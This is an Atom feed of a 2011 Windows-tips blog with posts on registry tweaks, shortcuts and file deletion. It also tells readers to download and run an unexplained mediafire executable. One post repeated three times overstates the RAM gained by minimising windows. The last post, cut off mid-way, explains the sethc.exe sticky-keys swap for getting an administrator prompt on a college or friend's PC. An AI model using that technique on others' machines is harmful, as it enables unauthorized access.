the same since the hacker  or the tools change your registry to disable these, just do these&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size: medium;"&gt;1st Method:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;1. Start ==&amp;gt;Run&lt;br /&gt;2.type in regedit&lt;br /&gt;3.Find:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Syst​em&lt;br /&gt;4. There would be a disable CMD or some thing familiar with that&lt;br /&gt;5.Disable it!&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size: medium;"&gt;2nd Method&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Download this, run it and it would re-enable your CMD&lt;br /&gt;&lt;a href="http://www.mediafire.com/?u23fb59jytfwn94" target="_blank"&gt;http://www.mediafire.com/?u23fb59jytfwn94&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(50, 205, 50);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-size: x-large;"&gt;Enable Task Manager&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Just use the first method of enable CMD, this time look for disble task manager or something and disable IT!!&lt;br /&gt;&lt;br /&gt;That's it guys, it's really simple!! Good luck guys!!!&lt;img src="http://www.hackforums.net/images/smilies/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0" /&gt;&lt;img src="http://www.hackforums.net/images/smilies/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0" /&gt;&lt;img src="http://www.hackforums.net/images/smilies/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0" /&gt;     &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6217085285622746690?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6217085285622746690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/re-enable-cmd-regedit-and-task-manager.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6217085285622746690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6217085285622746690'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/re-enable-cmd-regedit-and-task-manager.html' title='Re-enable CMD, Regedit and Task Manager from being block'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-7596513471242933671</id><published>2011-06-08T01:42:00.003-07:00</published><updated>2011-06-08T01:43:35.508-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ram'/><title type='text'>Increase ur RAM and so ur System Speed</title><content type='html'>&lt;span style=""&gt;1). Start any application, say Word. Open some large documents.&lt;br /&gt;&lt;br /&gt; 2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click  Processes tab and sort the list in descending order on Mem Usage. You  will notice that WINWORD.EXE will be somewhere at the top, using  multiple MBs of memory.&lt;br /&gt;&lt;br /&gt; 3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).&lt;br /&gt;&lt;br /&gt; 4). Now go back to the Windows Task Manager and see where WINWORD.EXE is  listed. Most probably you will not find it at the top. You will  typically have to scroll to the bottom of the list to find Word. Now  check out the amount of RAM it is using. Surprised? The memory  utilization has reduced by a huge amount.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;5). Minimize each application that you are currently not  working on by clicking on the Minimize button &amp;amp; you can increase  the amount of available RAM by a substantial margin. Depending upon the  number and type of applications you use together, the difference can be  as much as 50 percent of extra RAM. In any multitasking system,  minimizing an application means that it won't be utilized by the user  right now. Therefore, the OS automatically makes the application use  virtual memory &amp;amp; keeps bare minimum amounts of the code in physical  RAM.  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-7596513471242933671?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/7596513471242933671/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/increase-ur-ram-and-so-ur-system-speed_08.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7596513471242933671'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7596513471242933671'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/increase-ur-ram-and-so-ur-system-speed_08.html' title='Increase ur RAM and so ur System Speed'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1137011641006291655</id><published>2011-06-08T01:42:00.002-07:00</published><updated>2011-06-08T01:43:16.419-07:00</updated><title type='text'></title><content type='html'>&lt;span style=""&gt;1). Start any application, say Word. Open some large documents.&lt;br /&gt;&lt;br /&gt;  2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click  Processes tab and sort the list in descending order on Mem Usage. You  will notice that WINWORD.EXE will be somewhere at the top, using  multiple MBs of memory.&lt;br /&gt;&lt;br /&gt;  3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).&lt;br /&gt;&lt;br /&gt;  4). Now go back to the Windows Task Manager and see where WINWORD.EXE is  listed. Most probably you will not find it at the top. You will  typically have to scroll to the bottom of the list to find Word. Now  check out the amount of RAM it is using. Surprised? The memory  utilization has reduced by a huge amount.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;5). Minimize each application that you are currently not  working on by clicking on the Minimize button &amp;amp; you can increase  the amount of available RAM by a substantial margin. Depending upon the  number and type of applications you use together, the difference can be  as much as 50 percent of extra RAM. In any multitasking system,  minimizing an application means that it won't be utilized by the user  right now. Therefore, the OS automatically makes the application use  virtual memory &amp;amp; keeps bare minimum amounts of the code in physical  RAM.  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1137011641006291655?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1137011641006291655/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1137011641006291655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1137011641006291655'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/1.html' title=''/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-3543655986919864705</id><published>2011-06-08T01:42:00.001-07:00</published><updated>2011-06-08T01:42:59.734-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ram'/><title type='text'>Increase ur RAM and so ur System Speed</title><content type='html'>&lt;span style="font-size:-1;"&gt;1). Start any application, say Word. Open some large documents.&lt;br /&gt;&lt;br /&gt;   2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click  Processes tab and sort the list in descending order on Mem Usage. You  will notice that WINWORD.EXE will be somewhere at the top, using  multiple MBs of memory.&lt;br /&gt;&lt;br /&gt;   3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).&lt;br /&gt;&lt;br /&gt;   4). Now go back to the Windows Task Manager and see where WINWORD.EXE is  listed. Most probably you will not find it at the top. You will  typically have to scroll to the bottom of the list to find Word. Now  check out the amount of RAM it is using. Surprised? The memory  utilization has reduced by a huge amount.&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;5). Minimize each application that you are currently not  working on by clicking on the Minimize button &amp;amp; you can increase  the amount of available RAM by a substantial margin. Depending upon the  number and type of applications you use together, the difference can be  as much as 50 percent of extra RAM. In any multitasking system,  minimizing an application means that it won't be utilized by the user  right now. Therefore, the OS automatically makes the application use  virtual memory &amp;amp; keeps bare minimum amounts of the code in physical  RAM.  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-3543655986919864705?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/3543655986919864705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/increase-ur-ram-and-so-ur-system-speed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3543655986919864705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3543655986919864705'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/increase-ur-ram-and-so-ur-system-speed.html' title='Increase ur RAM and so ur System Speed'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5292724435558774532</id><published>2011-06-08T01:36:00.001-07:00</published><updated>2011-06-08T01:41:10.653-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp'/><title type='text'>How to disable the unread email notification in XP welcome screen</title><content type='html'>&lt;span style="font-size:-1;"&gt;Windows XP by default display the list of unread email  on the windows welcome screen. But some time this unread email  notification is   irritating users and they don't want to display it on the welcome  screen. They can easily disable it using the windows registry editor.  Make   sure before modifying your system Registry about its backup because  Registry contains all information how your system runs. This backup will    help you to restore Registry in case any problem occurs after modifying.&lt;br /&gt;&lt;/span&gt;&lt;a href="http://avitricks1.googlepages.com/unread-mail.gif"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 319px; height: 112px;" src="http://avitricks1.googlepages.com/unread-mail.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:-1;"&gt;Follow the given steps to disable the email notification option:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;First click on Start button and type "Regedit" in Run option.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://avitricks1.googlepages.com/run_editor.gif"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 340px; height: 174px;" src="http://avitricks1.googlepages.com/run_editor.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:-1;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;Here locate the location to:&lt;br /&gt;Navigate to&lt;br /&gt;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUnreadMail&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://avitricks1.googlepages.com/unread-email.gif"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 376px; height: 356px;" src="http://avitricks1.googlepages.com/unread-email.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:-1;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;Here in right side panel, double click on the key MessageExpiryDays and set its &lt;/span&gt;&lt;span style="font-size:-1;"&gt;value to 0.&lt;br /&gt;&lt;/span&gt;&lt;a href="http://avitricks1.googlepages.com/message-expiry.gif"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 329px; height: 252px;" src="http://avitricks1.googlepages.com/message-expiry.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:-1;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:-1;"&gt;But if MessageExpiryDays key doesn't exist, then in  right side panel, click right to create a key with the name  MessageExpiryDays and then set   its value to 0.&lt;br /&gt;&lt;br /&gt; Now close the registry editor and restart your computer after any changes to go into effect.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5292724435558774532?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5292724435558774532/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-disable-unread-email.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5292724435558774532'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5292724435558774532'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-disable-unread-email.html' title='How to disable the unread email notification in XP welcome screen'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6026145877841968113</id><published>2011-06-07T19:13:00.001-07:00</published><updated>2011-06-07T19:13:25.933-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Windows Shortcuts keys</title><content type='html'>Here are some windoes &lt;span class="IL_AD" id="IL_AD2"&gt;shortcut keys&lt;/span&gt;&lt;br /&gt;&lt;b&gt;Windows Shortcuts keys&lt;/b&gt;&lt;br /&gt;Alt + E — &lt;span class="IL_AD" id="IL_AD5"&gt;Opens&lt;/span&gt; the Edit menu&lt;br /&gt;Alt + Enter — Opens the &lt;span class="IL_AD" id="IL_AD6"&gt;Properties&lt;/span&gt; window&lt;br /&gt;Alt + F — Opens the File menu&lt;br /&gt;Alt + F4 — Closes the current program&lt;br /&gt;Alt + Print — Screen &lt;span class="IL_AD" id="IL_AD8"&gt;Takes&lt;/span&gt; a &lt;span class="IL_AD" id="IL_AD4"&gt;screen shot&lt;/span&gt; of the current window or program&lt;br /&gt;Alt + Tab — Switches between the programs currently in use&lt;br /&gt;CTRL+TAB — SWITCHES BETWEEN TAB IN &lt;span class="IL_AD" id="IL_AD9"&gt;DIALOG BOX&lt;/span&gt;,I.E 7&lt;br /&gt;Ctrl + A — Selects all text&lt;br /&gt;Ctrl + C — Copies the &lt;span class="IL_AD" id="IL_AD3"&gt;selected&lt;/span&gt; object&lt;br /&gt;Ctrl + End — Jumps to the end of the current document&lt;br /&gt;Ctrl + Esc — Opens the Start menu&lt;br /&gt;Ctrl + F4 — Closes the current program&lt;br /&gt;Ctrl + Home — Jumps to the beginning of the current document&lt;br /&gt;Ctrl + Insert — Copies the selected object&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Ctrl + left arrow — Moves to the left one word&lt;br /&gt;Ctrl + right arrow — Moves to the right one word&lt;br /&gt;Ctrl + V — Pastes the selected object&lt;br /&gt;Ctrl + X — Cuts the selected object&lt;br /&gt;Ctrl + the “+”key — Perfectly resizes the width of Explorer columns&lt;br /&gt;End — Jumps to the end of the current line&lt;br /&gt;F1 — Opens the Help menu&lt;br /&gt;F2 — Renames the selected icon&lt;br /&gt;F3 — &lt;span class="IL_AD" id="IL_AD11"&gt;Launches&lt;/span&gt; the Search Companion in a &lt;span class="IL_AD" id="IL_AD10"&gt;folder&lt;/span&gt; or on the&lt;br /&gt;desktop&lt;br /&gt;&lt;br /&gt;F4 — Accesses the Address &lt;span class="IL_AD" id="IL_AD12"&gt;Bar&lt;/span&gt; in a folder or window&lt;br /&gt;F5 — Refreshes the contents of a folder or window&lt;br /&gt;Home — Jumps to the beginning of the current line&lt;br /&gt;Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)&lt;br /&gt;Shift + End — &lt;span class="IL_AD" id="IL_AD1"&gt;Highlights&lt;/span&gt; text from the current position to the end of&lt;br /&gt;the line&lt;br /&gt;Shift + F10 — Substitutes for a right-click&lt;br /&gt;Shift + Home — Highlights text from the current position to the&lt;br /&gt;beginning of the line&lt;br /&gt;Shift + Insert — Pastes the selected object&lt;br /&gt;Shift while inserting — Prevents &lt;span class="IL_AD" id="IL_AD7"&gt;the CD&lt;/span&gt; player from playing an audio CD&lt;br /&gt;&lt;br /&gt;Shortcuts for Keyboards with a “Windows”Key (Resembling a Flag)&lt;br /&gt;&lt;br /&gt;Windows Key + E — Opens Windows Explorer&lt;br /&gt;Windows Key + F — Launches the Windows Search Companion&lt;br /&gt;Windows Key + F1 — Opens the Help and Support Center&lt;br /&gt;Windows Key + L — Locks down Windows&lt;br /&gt;Windows Key + M — Minimizes all windows and shows the desktop&lt;br /&gt;Windows Key + M + Shift — Undoes the minimize&lt;br /&gt;Windows Key + Opens — the System Properties window&lt;br /&gt;Pause/Break key&lt;br /&gt;Windows Key + R — Opens the Run window&lt;br /&gt;Windows Key + U — Launches the Utility Manager&lt;br /&gt;WINDOWS KEY+U — MINIMIZES ALL WINDOWS AND GOES TO DESKTOP&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6026145877841968113?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6026145877841968113/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/windows-shortcuts-keys.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6026145877841968113'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6026145877841968113'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/windows-shortcuts-keys.html' title='Windows Shortcuts keys'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6200641004834543553</id><published>2011-06-07T19:11:00.001-07:00</published><updated>2011-06-07T19:12:13.242-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>How to delete undetecteble file in windows xp</title><content type='html'>TOday ill tell u how to delete undetecteble file on XP. They are not &lt;span class="IL_AD" id="IL_AD2"&gt;deleted&lt;/span&gt; simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully.&lt;br /&gt;&lt;br /&gt;Click on Start, Search, All Files and Folders.&lt;br /&gt;&lt;br /&gt;Right-click on file and choose &lt;span class="IL_AD" id="IL_AD5"&gt;properties&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;file location example: c:\windows\&lt;span class="IL_AD" id="IL_AD4"&gt;system32&lt;/span&gt;\undeleteablefile.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Open a &lt;span class="IL_AD" id="IL_AD1"&gt;Command Prompt&lt;/span&gt; window&lt;br /&gt;&lt;br /&gt;Again Click on Start button, Run and type TASKMGR.EXE and press Enter &lt;span class="IL_AD" id="IL_AD7"&gt;to start&lt;/span&gt; Task manager&lt;br /&gt;Click on the Processes tab, click on the process named Explorer.exe and click on End Process.&lt;br /&gt;&lt;br /&gt;Minimize Task Manager.&lt;br /&gt;&lt;br /&gt;Go back to the Command Prompt window and change to the directory where the file is &lt;span class="IL_AD" id="IL_AD6"&gt;located&lt;/span&gt;. To do this, use &lt;span class="IL_AD" id="IL_AD3"&gt;the CD&lt;/span&gt; command.&lt;br /&gt;&lt;br /&gt;cd \windows\system32&lt;br /&gt;&lt;br /&gt;Type DEL where is the file you wish to delete.&lt;br /&gt;&lt;br /&gt;Example: del undeletablefile.exe&lt;br /&gt;&lt;br /&gt;Go back to Task Manager&lt;br /&gt;&lt;br /&gt;In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.&lt;br /&gt;&lt;br /&gt;Close Task Manager and the file is deleted.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6200641004834543553?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6200641004834543553/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-delete-undetecteble-file-in_07.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6200641004834543553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6200641004834543553'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-delete-undetecteble-file-in_07.html' title='How to delete undetecteble file in windows xp'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2061279048524897670</id><published>2011-06-07T19:11:00.000-07:00</published><updated>2011-06-07T19:12:12.477-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>How to delete undetecteble file in windows xp</title><content type='html'>TOday ill tell u how to delete undetecteble file on XP. They are not &lt;span class="IL_AD" id="IL_AD2"&gt;deleted&lt;/span&gt; simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully.&lt;br /&gt;&lt;br /&gt;Click on Start, Search, All Files and Folders.&lt;br /&gt;&lt;br /&gt;Right-click on file and choose &lt;span class="IL_AD" id="IL_AD5"&gt;properties&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;file location example: c:\windows\&lt;span class="IL_AD" id="IL_AD4"&gt;system32&lt;/span&gt;\undeleteablefile.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Open a &lt;span class="IL_AD" id="IL_AD1"&gt;Command Prompt&lt;/span&gt; window&lt;br /&gt;&lt;br /&gt;Again Click on Start button, Run and type TASKMGR.EXE and press Enter &lt;span class="IL_AD" id="IL_AD7"&gt;to start&lt;/span&gt; Task manager&lt;br /&gt;Click on the Processes tab, click on the process named Explorer.exe and click on End Process.&lt;br /&gt;&lt;br /&gt;Minimize Task Manager.&lt;br /&gt;&lt;br /&gt;Go back to the Command Prompt window and change to the directory where the file is &lt;span class="IL_AD" id="IL_AD6"&gt;located&lt;/span&gt;. To do this, use &lt;span class="IL_AD" id="IL_AD3"&gt;the CD&lt;/span&gt; command.&lt;br /&gt;&lt;br /&gt;cd \windows\system32&lt;br /&gt;&lt;br /&gt;Type DEL where is the file you wish to delete.&lt;br /&gt;&lt;br /&gt;Example: del undeletablefile.exe&lt;br /&gt;&lt;br /&gt;Go back to Task Manager&lt;br /&gt;&lt;br /&gt;In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.&lt;br /&gt;&lt;br /&gt;Close Task Manager and the file is deleted.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2061279048524897670?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2061279048524897670/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-delete-undetecteble-file-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2061279048524897670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2061279048524897670'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-delete-undetecteble-file-in.html' title='How to delete undetecteble file in windows xp'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6702890111877897473</id><published>2011-06-07T19:09:00.000-07:00</published><updated>2011-06-07T19:10:43.166-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='administrator'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>hack administrators password through guest login</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Learn to&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; hack administrators password through guest login&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Ever wanted to hack your college pc with guest account/student account so that you can &lt;span class="IL_AD" id="IL_AD3"&gt;download&lt;/span&gt; with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell &lt;span class="IL_AD" id="IL_AD7"&gt;your success&lt;/span&gt;  story of hacking ? well,there is a great way of hacking an  administrator account from a guest account by which you can reset the &lt;span class="IL_AD" id="IL_AD2"&gt;administrator password&lt;/span&gt; and &lt;span class="IL_AD" id="IL_AD12"&gt;getting&lt;/span&gt; all the privilages an administrator enjoys on windows..Interested ? read on...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Concept:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;Press shift key 5 times and the sticky key dialog shows up.This works even at the &lt;span class="IL_AD" id="IL_AD6"&gt;logon screen&lt;/span&gt;.  But If we replace the sethc.exe which is responsible for the sticky key  dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5  times at logon screen,we will get a &lt;span class="IL_AD" id="IL_AD4"&gt;command prompt&lt;/span&gt; with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;   